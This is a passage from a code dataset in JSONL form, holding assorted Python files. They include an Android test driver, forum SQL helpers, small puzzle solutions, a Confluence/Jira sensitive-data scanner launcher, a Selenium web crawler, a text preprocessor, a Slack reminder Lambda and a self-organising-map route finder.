duration=600):\n origin_bounds = origin_el.get_attribute('bounds')\n destination_bounds = destination_el.get_attribute('bounds')\n origin_x, origin_y = (origin_bounds[0] + origin_bounds[2]) / 2, \\\n (origin_bounds[1] + origin_bounds[3]) / 2\n destination_x, destination_y = (destination_bounds[0] + destination_bounds[2]) / 2, \\\n (destination_bounds[1] + destination_bounds[3]) / 2\n self.swipe(origin_x, origin_y, destination_x, destination_y, duration)\n\n @property\n def page_source(self):\n return self.device.dump_hierarchy()\n\n # @dialog_box_handler\n def back(self):\n self.current_state = self.monitor.before_back(self.current_state)\n self.device.press('back')\n time.sleep(4)\n self.current_state, _ = self.monitor.after_back(self.current_state)[0]\n\n # @dialog_box_handler\n def swipe(self, begin_x, begin_y, end_x, end_y, duration=0):\n self.current_state = self.monitor.before_swipe(self.current_state)\n self.device.swipe(begin_x, begin_y, end_x, end_y, duration / 1000)\n identify = {'begin_x': begin_x, 'begin_y': begin_y, 'end_x': end_x, 'end_y': end_y, 'duration': duration}\n time.sleep(4)\n self.current_state, _ = self.monitor.after_swipe(self.current_state, None, identify)[0]\n\n def launch_app(self):\n self.current_state = self.monitor.before_launch(self.current_state)\n self.device.app_start(self.capabilities['appPackage'], self.capabilities['appActivity'])\n time.sleep(2)\n self.current_state, _ = self.monitor.after_launch(self.current_state)\n\n def close_app(self):\n self.current_state = self.monitor.before_home(self.current_state)\n self.device.press('home')\n time.sleep(2)\n self.current_state, _ = self.monitor.after_home(self.current_state)\n self.current_state = self.monitor.before_stop(self.current_state)\n self.device.app_stop(self.capabilities['appPackage'])\n time.sleep(2)\n self.current_state, _ = self.monitor.after_stop(self.current_state)\n\n def update_capabilities(self, **desired_caps):\n for cap in desired_caps:\n self.capabilities[cap] = desired_caps[cap]\n\n # 判断device和capabilities是否匹配\n @staticmethod\n def check_capabilities(capabilities, device: Device):\n if capabilities is not None:\n if 'appPackage' not in capabilities:\n raise Exception('the attribute appPackage does not in capabilities!')\n d_info = device.device_info\n d_version = d_info['version'].split('.')\n cap_version = capabilities['platformVersion'].split('.')\n if len(d_version) < len(cap_version):\n d_version += ['0'] * (len(cap_version) - len(d_version))\n elif len(cap_version) < len(d_version):\n cap_version += ['0'] * (len(d_version) - len(cap_version))\n if d_version != cap_version:\n raise Exception(\n f\"the version of the device is {d_info['version']} but the platformVersion of the capabilities is {capabilities['platformVersion']}!\")\n else:\n raise Exception(\"missing capabilities!\")\n\n @staticmethod\n def build(desired_caps):\n device = u2.connect_usb()\n # 判断device和capabilities是否匹配\n AppiumScriptDriver.check_capabilities(desired_caps, device)\n app = App(None, None, desired_caps['appActivity'], desired_caps['appPackage'], None)\n task = Task(app, ExecutionStrategy.APPIUM, StateComparisonStrategy.XML, None, app, False)\n monitor = AndroidEventMonitor(task.get_arp(), device)\n driver = AppiumScriptDriver(monitor, device, desired_caps)\n driver.launch_app()\n return driver\n\n def save_result(self, saved_path):\n arpp = ARPPersistence(self.monitor.app, saved_path)\n arpp.save2disk()\n","repo_name":"entropydec/Android2Harmony","sub_path":"lib/arp/executor/appium_driver/AppiumScriptDriver.py","file_name":"AppiumScriptDriver.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15158774775","text":"__author__ = 'max'\n\nfrom queries.utils import *\n\n\ndef get_post_by_id(cursor, post_id):\n post_id = to_number(post_id, 'post_id')\n query = '''SELECT *\n FROM `Post`\n WHERE `id` = %s\n LIMIT 1;\n '''\n params = (post_id,)\n cursor.execute(query, params)\n\n post = cursor.fetchone()\n if post is None:\n raise NotFound(\"Post with the '%d' id is not found\" % post_id)\n\n prepare_post(post)\n return post\n\n\ndef set_post(cursor, date, thread, message, user, forum, is_deleted, parent, is_approved, is_highlighted, is_edited, is_spam):\n is_deleted = to_bool(is_deleted, 'is_deleted')\n thread = to_number(thread, 'thread')\n\n is_approved = to_bool(is_approved, 'is_approved')\n is_highlighted = to_bool(is_highlighted, 'is_highlighted')\n is_edited = to_bool(is_edited, 'is_edited')\n is_spam = to_bool(is_spam, 'is_spam')\n\n query = '''INSERT INTO `Post` (`date`, `thread`, `message`, `user`, `forum`, `isDeleted`, `parent`, `isApproved`, `isHighlighted`, `isEdited`, `isSpam`)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n '''\n\n params = (date, thread, message, user, forum, is_deleted, parent, is_approved, is_highlighted, is_edited, is_spam)\n cursor.execute(query, params)\n\n post = {'date': date, 'thread': thread, 'message': message, 'user': user, 'forum': forum,\n 'isDeleted': is_deleted, 'parent': parent, 'isApproved': is_approved, 'isHighlighted': is_highlighted,\n 'isEdited': is_edited, 'isSpam': is_spam, 'dislikes': 0, 'likes': 0, 'points': 0, 'path': ''}\n return post\n\n\ndef set_post_deleted(cursor, post, logical):\n post = to_number(post, 'post')\n query = '''UPDATE `Post`\n SET `isDeleted` = {0}\n WHERE `id` = %s;\n '''.format(logical)\n params = (post,)\n cursor.execute(query, params)\n\n if logical == 'True':\n logical = '- 1'\n else:\n logical = '+ 1'\n\n post = get_post_by_id(cursor, post)\n query = '''UPDATE `Thread`\n SET `posts` = `posts` {0}\n WHERE `id` = %s;\n '''.format(logical)\n params = (post['thread'],)\n cursor.execute(query, params)\n\n\ndef set_post_message(cursor, post, message):\n post = to_number(post, 'post')\n query = '''UPDATE `Post`\n SET `message` = %s\n WHERE `id` = %s;\n '''\n\n params = (message, post)\n cursor.execute(query, params)\n\n\ndef set_post_vote(cursor, post, vote):\n post = to_number(post, 'post')\n\n if vote < 0:\n column = 'dislikes'\n points = '- 1'\n else:\n column = 'likes'\n points = '+ 1'\n\n query = '''UPDATE `Post`\n SET `{0}` = `{0}` + 1, `points` = `points` {1}\n WHERE `id` = %s;\n '''.format(column, points)\n params = (post,)\n cursor.execute(query, params)","repo_name":"xammi/Curs_DB","sub_path":"queries/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"39662366832","text":"# The \"look and say\" sequence is defined as follows: beginning with the term 1,\n# each subsequent term visually describes the digits appearing in the previous\n# term. The first few terms are as follows:\n\n# 1\n# 11\n# 21\n# 1211\n# 111221\n\n# As an example, the fourth term is 1211, since the third term consists of one\n# 2 and one 1.\n\n# Given an integer N, print the Nth term of this sequence.\n\n\ndef look_and_say(n):\n term = '1'\n for _ in range(n):\n term = describe(term)\n\n return term\n\n\ndef describe(term):\n last = term[0]\n count = 1\n ans = ''\n for i in range(1, len(term)):\n if term[i] == last:\n count += 1\n else:\n ans += '{}{}'.format(count, last)\n count = 1\n last = term[i]\n\n return ans + '{}{}'.format(count, last)\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n print(i, '->', look_and_say(i))\n","repo_name":"kemingy/daily-coding-problem","sub_path":"src/look_and_say.py","file_name":"look_and_say.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"23873742527","text":"from src.main.java.algorithms.EasySumSetProblem.solution3 \\\n import calculate_b\nimport pytest\nfrom typing import List\n\n\ntest_data = [\n ([1, 2], [3, 4, 5], ['2', '3']),\n ([3], [5, 6], ['2', '3']),\n ([4, 3, 5, 1], [3, 5, 6, 7, 8, 9], ['2', '4']),\n ([1, 3, 2, 5, 4], [2, 3, 4, 5, 6], ['1'])\n]\n\n\n@pytest.mark.parametrize(\"array_a,array_c,array_b\", test_data)\ndef test_easy_sum_set(array_a: List[int],\n array_c: List[int], array_b: List[str]):\n print(f\"expected = {array_b}\")\n print(f\"actual = {calculate_b(array_a, array_c)}\")\n assert len(array_b) == len(calculate_b(array_a, array_c))\n assert all([a == b for a, b in zip(\n array_b, calculate_b(array_a, array_c))])\n","repo_name":"apetrovskiy/testHaEa","sub_path":"src/test/java/algorithms/EasySumSetProblem/test_easy_sum_set.py","file_name":"test_easy_sum_set.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4675072744","text":"# -*- coding: utf-8 -*-\n\n# input\nN, Y = map(int, input().split())\n\n# solve\nans = [-1] * 3\nfor x in range(N + 1):\n for y in range(N + 1):\n z = N - x - y\n if 10000 * x + 5000 * y + 1000 * z == Y and z >= 0:\n ans = [x, y, z]\n break\n\n# output\nprint(*ans)\n","repo_name":"tapioka324/atcoder","sub_path":"ABC/085/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18576809731","text":"#!/usr/bin/python3\n\nimport json\nimport argparse\nimport time\nimport traceback\nimport sys\nimport uuid\nimport parsers.confluence.parser as confluence_parser\nimport parsers.jira.parser as jira_parser\nimport parsers.redmine.parser as redmine_parser\nfrom termcolor import colored, cprint\nfrom datetime import datetime\n\n\ndef generate_job_id():\n return str(uuid.uuid4())\n\n\ndef check_conf(service_name: str):\n conf = {}\n if config[service_name]['url'] and len(config[service_name]['url']) != 0:\n conf['url'] = config[service_name]['url']\n else:\n raise Exception(f'{service_name} url error')\n\n if config[service_name]['credentials']['login'] and len(config[service_name]['credentials']['login']) != 0:\n conf['login'] = config[service_name]['credentials']['login']\n else:\n raise Exception(f'{service_name} login error')\n\n if config[service_name]['credentials']['password'] and len(config[service_name]['credentials']['password']) != 0:\n conf['password'] = config[service_name]['credentials']['password']\n else:\n raise Exception(f'{service_name} password error')\n\n if 'spaces' in config[service_name]:\n conf['spaces'] = config[service_name]['spaces']\n else:\n raise Exception('Spaces error')\n\n if 'oauth' in config[service_name]:\n conf['oauth'] = config[service_name]['oauth']\n conf['client_id'] = config[service_name]['credentials']['client_id']\n conf['client_secret'] = config[service_name]['credentials']['client_secret']\n conf['consumer_key'] = config[service_name]['credentials']['consumer_key']\n conf['private_key'] = config[service_name]['credentials']['private_key']\n else:\n raise Exception('Spaces error')\n\n\n\n if 'context_capture_span' in config['base_config']:\n conf['context_capture_span'] = config['base_config']['context_capture_span']\n else:\n conf['re_scan'] = 50\n\n if config['base_config']['re_scan']:\n conf['re_scan'] = config['base_config']['re_scan']\n else:\n conf['re_scan'] = True\n\n if config['base_config']['uuid_scan']:\n conf['uuid_scan'] = config['base_config']['uuid_scan']\n else:\n conf['uuid_scan'] = True\n\n if config['base_config']['twartefacts_scan']:\n conf['twartefacts_scan'] = config['base_config']['twartefacts_scan']\n else:\n conf['twartefacts_scan'] = True\n\n if config['base_config']['experimental_scan']:\n conf['experimental_scan'] = config['base_config']['experimental_scan']\n else:\n conf['experimental_scan'] = False\n\n if config['base_config']['gdocs_search']:\n conf['gdocs_search'] = config['base_config']['gdocs_search']\n else:\n conf['gdocs_search'] = False\n\n if config['base_config']['notifications']['myteam']['enabled'] is True:\n conf['myteam_notifications'] = config['base_config']['notifications']['myteam']\n\n if config['base_config']['notifications']['defectDojo']['enabled'] is True:\n conf['defecdojo_notifications'] = config['base_config']['notifications']['defectDojo']\n\n conf['badlist'] = config['lists']['badlist']\n conf['badrootlist'] = config['lists']['badrootlist']\n conf['job_id'] = generate_job_id()\n\n return conf\n\n\ndef run(config: dict):\n if not isinstance(config['lists']['badlist'], list):\n raise Exception('badlist error in config file')\n\n if not isinstance(config['lists']['badrootlist'], list):\n raise Exception('badrootlist error in config file')\n\n if args.redmine is True:\n conf = check_conf('redmine')\n print_start_out(conf['url'], 'redmine', conf['job_id'])\n redmine_parser.run(conf)\n\n if args.confluence is True:\n conf = check_conf('confluence')\n # print(conf)\n print_start_out(conf['url'], 'confluence', conf['job_id'])\n c = confluence_parser.ConfluenceParser(conf)\n c.run()\n\n if args.jira is True:\n conf = check_conf('jira')\n # print(conf)\n print_start_out(conf['url'], 'jira', conf['job_id'])\n j = jira_parser.JiraParser(conf)\n j.run()\n\n\ndef print_start_out(url: str, type: str, job_id: str):\n msg_1 = f\"Start {type} parser: {url}\"\n msg_2 = f\"Started job ID: {job_id}\"\n print(colored(msg_1, 'white', on_color='on_cyan', attrs=['bold','blink']))\n print(colored(\"\".join([\"=\" * len(msg_1)]), 'magenta', on_color='on_white', attrs=['bold','blink']))\n print(colored(msg_2, 'white', on_color='on_cyan', attrs=['bold','blink']))\n\n\ndef get_config(path: str):\n with open(path) as json_file:\n config_data = json.load(json_file)\n return config_data\n\n\nif __name__ == '__main__':\n start_time = time.time()\n try:\n parser = argparse.ArgumentParser(description='Sensitive finder v0.1')\n parser.add_argument('--config', help='Path to json config file', default='config.json')\n parser.add_argument('--redmine', help='Run Redmine parser', action='store_true', default=False)\n parser.add_argument('--confluence', help='Run Confluence parser', action='store_true', default=False)\n parser.add_argument('--jira', help='Run Jira parser', action='store_true', default=False)\n parser.add_argument('--debug', help='Enable debug', action='store_true', default=False)\n\n args = parser.parse_args()\n try:\n config = get_config(args.config)\n except Exception as ex:\n print(ex)\n sys.exit(0)\n\n try:\n run(config)\n except Exception as ex:\n print(ex)\n if args.debug == True:\n print(traceback.format_exc())\n finally:\n print(\"time elapsed: {:.2f}s\".format(time.time() - start_time))","repo_name":"doublestraus/secret-finder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"20578271951","text":"import json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom Jogo import *\nimport time\n\nclass Crawler():\n\n def __init__(self, titulo, url) -> None:\n self.titulo = titulo\n self.url = url\n \n\n def accessPage(self):\n driver = webdriver.Firefox()\n driver.get(self.url)\n\n\nclass CrawlerGalapagos(Crawler):\n\n def __init__(self, titulo, url, jogos) -> None:\n Crawler.__init__(self, titulo, url)\n self.extractGalapagos(jogos)\n\n\n \n\n def extractGalapagos(self, jogos):\n if( self.url.nomeSite == 'Galapagos'):\n\n options = Options()\n options.add_argument(\"--headless\")\n driver = webdriver.Firefox(options=options)\n\n driver.get('https://www.mundogalapagos.com.br/')\n time.sleep(5)\n\n elem = driver.find_element(By.XPATH, '//*[@id=\"CC-headerWidget-Search\"]')\n elem.clear()\n elem.send_keys(self.titulo)\n elem.send_keys(Keys.RETURN)\n time.sleep(5)\n\n\n ts = driver.find_elements(By.XPATH , \"//article/div[contains(@class,'product-cover')]\")\n print(len(ts))\n \n\n\n href =[]\n for i in range(0,len(ts)):\n h = ts[i].find_element(By.TAG_NAME, 'a')\n href.append(h.get_attribute(\"href\"))\n #print(href)\n \n if (len(ts) == 0):\n return -1\n else:\n for page in href:\n driver.get(page)\n time.sleep(5)\n tn = driver.find_elements(By.CLASS_NAME , 'product-title')\n #print(ts[0].text)\n te = driver.find_elements(By.CLASS_NAME , 'info-item-text')\n print(len(te))\n if(len(te) >= 3 ):\n numjogs = te[0].text\n idade = int(te[1].text.removesuffix('+'))\n tempo = te[2].text\n else:\n numjogs = None\n idade = None\n tempo = None\n \n tp = driver.find_elements(By.CLASS_NAME , 'best-price')\n disp=''\n preco =''\n if(len(tp) == 0):\n disp = False\n preco = None\n else:\n disp = True\n preco = tp[0].text \n preco = float(preco.removeprefix('R$ ').replace(',', '.'))\n #print(ts[0].text)\n print(tn[0].text, disp, numjogs, idade, tempo, \"Mundo Galapagos\", self.url.nomeSite, preco)\n\n jogos.append(Jogo(tn[0].text, disp, numjogs, idade, tempo, \"Mundo Galapagos\", self.url.nomeSite, preco))\n driver.close()\n\nclass CrawlerPlayEasy(Crawler):\n\n def __init__(self, titulo, url, jogos) -> None:\n Crawler.__init__(self, titulo, url)\n self.extractPlayEasy(jogos)\n\n\n \n\n def extractPlayEasy(self, jogos):\n \n titulo = self.titulo\n titulo = titulo.replace(':', '')\n jogo = Jogo('', False, '', 0, '', '', 'PlayEasy', 0.0)\n\n options = Options()\n options.add_argument(\"--headless\")\n driver = webdriver.Firefox(options=options)\n driver.get('https://www.playeasy.com.br/')\n\n time.sleep(3)\n elem = driver.find_element(By.XPATH, '//*[@id=\"search\"]')\n elem.clear()\n elem.send_keys(titulo)\n elem.send_keys(Keys.RETURN)\n\n time.sleep(5)\n\n lis = driver.find_elements(By.TAG_NAME, 'li')\n\n i = []\n for li in lis:\n if titulo in li.text:\n i.append(li)\n\n #print(len(driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[4]/section/ul/li')))\n assert 'No results found.' not in driver.page_source\n for i in range(1, len(i)):\n driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[4]/section/ul/li[{i}]').click()\n try:\n titulo = driver.find_element(By.XPATH,'/html/body/main/div[6]/section/div[2]/article/div[1]/div[2]/div/form/div[2]/h2').text\n except:\n titulo = None\n print(\"algo deu errado com o titulo\")\n disponibilidade = True if 'Em estoque' in driver.find_element(By.XPATH, '//*[@id=\"info-secundaria\"]').text else False\n preco = None if disponibilidade is False else driver.find_element(By.XPATH, '/html/body/main/div[6]/section/div[2]/article/div[1]/div[2]/div/form/div[6]/div[1]/div[1]/div/span/span[1]').text\n if preco:\n preco = float(preco.removeprefix('R$ ').replace(',', '.'))\n else:\n preco = None\n\n num = 4\n\n # O TR MUDA PORQUE AS ESPECIFICACOES TECNICAS SAO MUITO BUGADAS, TEM QUE RESOLVER\n try:\n numJogadores = driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[5]/td').text\n except:\n numJogadores = None\n print(\"algo deu errado com numero de jogadores de \" + titulo)\n try:\n idade = int(driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[3]/td').text.removesuffix('+'))\n except:\n idade = None\n print(\"algo deu errado com idade jogador de \" + titulo)\n try:\n tempoJogo = driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[6]/td').text\n except:\n tempoJogo = None\n print(\"algo deu errado com tempo de jogo de \" + titulo)\n try:\n editora = driver.find_element(By.XPATH, f'/html/body/main/div[6]/section/div[2]/article/div[{num}]/div/div/table/tbody/tr[1]/td').text\n except:\n editora = None\n print(\"algo deu errado com editora de \" + titulo)\n print(titulo, disponibilidade, numJogadores, idade, tempoJogo, editora, preco)\n jogos.append(Jogo(titulo, disponibilidade, numJogadores, idade, tempoJogo, editora, 'Play Easy', preco))\n driver.back()\n time.sleep(2)\n\n print(jogos)\n\n driver.close()\n","repo_name":"andersonzambeli/ine5238","sub_path":"Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21422423635","text":"import contractions\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\n\nclass TextProcessor:\n\n @staticmethod\n def preprocess_pipeline(df, col, stopwords):\n tp = TextProcessor\n df = df.copy() # to avoid some warnings (SettingWithCopyWarning)\n # is, ASAP !!!!\n df = tp.apply_contractions(df, col)\n # is, AS SOON AS POSSIBLE !!!!\n df = tp.remove_nonAlphanumeric(df, col)\n # is AS SOON AS POSSIBLE\n df = tp.to_lower(df, col)\n # is as soon as possible\n df = tp.apply_lemmatization(df, col)\n # be as soon as possible\n if not stopwords:\n df = tp.remove_stopwords(df, col)\n # soon possible\n df = tp.remove_extra_spaces(df, col)\n # soon possible\n return df\n\n\n @staticmethod\n def apply_contractions(df, col):\n df[col] = df[col].apply(contractions.fix)\n return df\n\n @staticmethod\n def remove_nonAlphanumeric(df, col):\n df[col] = df[col].str.replace(r\"[^a-zA-Z]\", \" \", regex=True)\n return df\n\n @staticmethod\n def to_lower(df, col):\n df[col] = df[col].str.lower()\n return df\n\n @staticmethod\n def apply_lemmatization(df, col):\n wordnet_lemmatizer = WordNetLemmatizer()\n\n def lemmatize(field):\n tokens = field.split()\n lemmatized = [wordnet_lemmatizer.lemmatize(word, pos=\"v\") for word in tokens]\n return \" \".join(lemmatized)\n\n df[col] = df[col].apply(lemmatize)\n return df\n\n @staticmethod\n def remove_stopwords(df, col):\n stop_words = list(stopwords.words('english'))\n for stop_word in stop_words:\n pattern = r\"\\b\" + stop_word + r\"\\b\"\n df[col] = df[col].str.replace(pattern, '', regex=True)\n\n return df \n\n\n @staticmethod\n def remove_extra_spaces(df, col): \n df[col] = df[col].str.replace(r'\\s+', ' ', regex=True)\n return df","repo_name":"AmosChenZixuan/DS-A3-UserRequirementsClassification","sub_path":"utils/text_processor.py","file_name":"text_processor.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7906139247","text":"import datetime\nfrom collections import Counter\nfrom bs4 import BeautifulSoup\nimport os\nimport csv\n\n\n# extract all words from HTML and calculate the top 10 words\n# The Top 10 Words on each Page are stored in CSV wrt to each Web Page URL\nclass HTMLProcessor:\n url = ''\n page = ''\n\n # CSV File name using the date format\n date = datetime.datetime.now()\n csvfilename = ''\n\n def __init__(self, pageurl):\n self.url = pageurl\n\n #\n def __init__(self, pageurl, pagedoc, filename):\n self.url = pageurl\n self.page = pagedoc\n # csv file name initialized once\n self.csvfilename = 'web-{year}-{month}-{day}-{min}'.format(year=self.date.year, month=self.date.month,\n day=self.date.day,\n min=self.date.minute)\n\n # Word Frequency counter after crawling a web-page\n\n # Function defining the web-crawler,\n # which will fetch information from\n # a given website, and push the contents to\n # the second function clean_wordlist()'''\n def startcounting(self):\n\n # empty list to store the contents of\n # the website fetched from our web-crawler\n wordlist = []\n\n soup = BeautifulSoup(self.page, 'html.parser')\n\n # Text in given web-page get the words and add into an collection\n content = soup.find().getText()\n words = content.lower().split()\n\n for each_word in words:\n wordlist.append(each_word)\n self.clean_wordlist(wordlist)\n\n # Function removes any unwanted symbols\n def clean_wordlist(self, wordlist):\n\n clean_list = []\n for word in wordlist:\n symbols = '!@#$%^&*()_-+={[}]|\\;:\"<>?/., '\n\n for i in range(0, len(symbols)):\n word = word.replace(symbols[i], '')\n\n if len(word) > 0:\n clean_list.append(word)\n self.create_dictionary(clean_list)\n\n # Creates a dictionary containing each word's\n\n # count and top_20 words and store with URL\n def create_dictionary(self, clean_list):\n word_count = {}\n word_count2 = {}\n\n for word in clean_list:\n if word in word_count:\n word_count[word] += 1\n else:\n word_count[word] = 1\n\n count = 0\n\n for word2 in clean_list:\n word2 = self.listToString(clean_list[count:count + 2])\n if word2 in word_count2:\n word_count2[word2] += 1\n else:\n word_count2[word2] = 1\n count += 1\n\n ''' To get the count of each word in \n the crawled page --> \n <-- '''\n\n c = Counter(word_count)\n c2 = Counter(word_count2)\n\n # returns the most occurring elements\n top = c.most_common(10)\n top2 = c2.most_common(10)\n self.fileWriter(top)\n self.fileWriter(top2)\n\n # To convert a list to string\n # Function to convert\n def listToString(self, s):\n # initialize an empty string\n str1 = \"\"\n\n # traverse in the string\n for ele in s:\n str1 += ele\n\n # return string\n return str1\n\n # Writing the data to csv file\n def fileWriter(self, inputString):\n cwd = os.getcwd()\n with open(f\"{cwd}/{self.csvfilename}.csv\", 'a') as out_file:\n writer = csv.writer(out_file)\n writer.writerow([self.url, inputString])\n","repo_name":"SSaxena/WebCrawler","sub_path":"src/HTMLProcessor.py","file_name":"HTMLProcessor.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15305869434","text":"import json\n\nimport logging\nfrom slack_sdk import WebClient\n\nfrom dinner_optimizer_shared import credentials_handler as creds\nfrom dinner_optimizer_shared import message_persistence as persistence\nfrom dinner_optimizer_shared import time_utils\n\nfrom dinner_optimizer_shared.interaction import Interaction\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nconsoleHandler = logging.StreamHandler()\nlogger.addHandler(consoleHandler)\n\n\ndef lambda_handler(event, context):\n logger.info(json.dumps(event))\n\n channel_id = event[\"slack_channel_id\"]\n\n credentials = creds.fetch_creds_from_secrets_manager()\n\n slack_client = WebClient(token=credentials[\"SLACK_BOT_TOKEN\"])\n\n past_recommendations: list[Interaction] = []\n for n in reversed(range(2, 5)):\n w = time_utils.nth_most_recent_saturday(n)\n past_interactions = persistence.retrieve_interactions_for_week(w, channel_id)\n\n # Add them to the current week's history.\n bot_messages = list(filter(lambda x: x.role == \"assistant\", past_interactions))\n if len(bot_messages) < 1:\n continue\n\n past_recommendations.append(bot_messages[-1])\n\n for pr in past_recommendations:\n persistence.record_conversation_message(\n pr, time_utils.most_recent_saturday(), channel_id\n )\n\n slack_client.chat_postMessage(\n channel=channel_id,\n text=\"*It's time to meal plan soon!*\\n\\nPost before 2pm with any special requests you might have this week, and I'll include them.\",\n )\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\"success\": True}),\n }\n\n\ndef cli():\n event = {\n # Beta\n \"slack_channel_id\": \"C060L3A1J4W\"\n }\n lambda_handler(event, None)\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"mungewrath/dinner-optimizer","sub_path":"upcoming_reminder/src/upcoming_reminder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15050120376","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.spatial.distance import euclidean\r\n\r\n\r\n\"\"\"\r\n GLOBAL VARIABLES DO NOT TOUCH!\r\n the code will be cursed if you touch anything - maybe don't even look at the code...\r\n\"\"\"\r\nspecies = 32\r\nattributes = 2\r\nn = 10\r\nsigma = 1\r\n\r\n\r\ndef read_data_cities(cities):\r\n \"\"\"\r\n Func read_data_cities/1\r\n @spec read_data_cities(string) :: np.array()\r\n Takes the file path and reads the file - returns the parsed file as an input array for our Neural Network\r\n \"\"\"\r\n f = open(cities, \"r\")\r\n city_map = []\r\n for line in f:\r\n city_map.append(line.split(\"\\n\")[0].split(\",\"))\r\n training = np.asfarray(np.array(city_map), float)\r\n return training\r\n\r\n\r\ndef find_closest(animal, W, num_neighbour, grannar=True, eta=0.2):\r\n \"\"\"\r\n Func find_closest/5\r\n @spec find_closest(np.array(), np.array(), integer, boolean, integer) :: np.array()\r\n Given a data-sample 'animal', a weight matrix 'W', an integer of how many neighbours should be used\r\n -> update the weight matrix W based on the number of neighbours.\r\n \"\"\"\r\n dist = np.zeros(n)\r\n for i, w in enumerate(W):\r\n dist[i] = np.linalg.norm(animal-w)\r\n\r\n if not grannar:\r\n return np.argmin(dist)\r\n\r\n for index in range(num_neighbour):\r\n tmp_index = 0\r\n if np.argmin(dist) + index > len(W) - 1:\r\n tmp_index = np.argmin(dist) + index - len(W)\r\n W[tmp_index] += eta * (animal - W[tmp_index])\r\n if np.argmin(dist) - index < 0:\r\n tmp_index = np.argmin(dist) - index + len(W) - 1\r\n W[tmp_index] += eta * (animal - W[tmp_index])\r\n else:\r\n W[np.argmin(dist) - index] += eta * (animal - W[np.argmin(dist) - index])\r\n else:\r\n W[np.argmin(dist) + index] += eta * (animal - W[np.argmin(dist) + index])\r\n if np.argmin(dist) - index < 0:\r\n tmp_index = np.argmin(dist) - index + len(W) - 1\r\n W[tmp_index] += eta * (animal - W[tmp_index])\r\n else:\r\n W[np.argmin(dist) - index] += eta * (animal - W[np.argmin(dist) - index])\r\n return W\r\n\r\n\r\ndef save_the_animals(input, epoch=20):\r\n \"\"\"\r\n Func save_the_animals/2\r\n @spec save_the_animals(list, integer) :: void\r\n Find the correct solution to the given minimization problem.\r\n Currently finds a short (maybe shortest) path for the Travel Sales Person problem\r\n which is known to be unsolvable in polynomial time complexity.\r\n \"\"\"\r\n w = np.random.rand(2, n)\r\n w = w.T\r\n # Update W\r\n for e in range(epoch):\r\n for animal in input:\r\n # This neighboy variable is the solution to everything - don't ever question why we use this formula.\r\n # The formula to calculate the number of neighbours came to me in a dream - and it is our highest truth.\r\n neighboy = round((n - e)/2)\r\n w = find_closest(animal, w, neighboy)\r\n # Route array used for storing argmin of weight vector rows\r\n pos = np.zeros(n)\r\n for i in range(n):\r\n # Just something big\r\n distance = np.zeros(n)\r\n # Pick out the data point\r\n data_point_x = input[i, :]\r\n for j in range(n):\r\n # Calculate the the distance from the point x to all weights of row j in W\r\n distance[j] = euclidean(data_point_x, w[j, :])\r\n pos[i] = np.argmin(distance)\r\n # Now we have the route\r\n ordered = np.argsort(pos)\r\n # Add the starting position as last position in the route - since we are doing a cycle\r\n ordered = np.append(ordered, ordered[0])\r\n print(f\"The ordered route looks like this:\\n |-> {ordered}\")\r\n plt.title(\"Cyclic route\")\r\n plt.scatter(input[ordered][:, 0], input[ordered][:, 1])\r\n plt.plot(input[ordered][:, 0], input[ordered][:, 1])\r\n plt.show()\r\n\r\n\r\ndef main():\r\n print(\"### -- In main cyclic.py -- ###\")\r\n city_input = read_data_cities(\".\\\\datasets\\\\cities.dat\")\r\n save_the_animals(city_input)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"wilhelmagren/DD2437-Artificial-Neural-Networks-and-Deep-Architectures","sub_path":"Lab2/cyclic.py","file_name":"cyclic.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7025083544","text":"import sys, os\n#python cluster_enrichment_031814_2.py clusterfile Go-annotfile outputfile\ncluster_result = sys.argv[1] #contains gene: cluster\ngo_annot = open(sys.argv[2], 'r') #contains GO term: gene or pathway info- gene:pathway\n#genenum= int(sys.argv[3]) #number of genes in total for A. thaliana this is 27511\n\n\n### make gene and 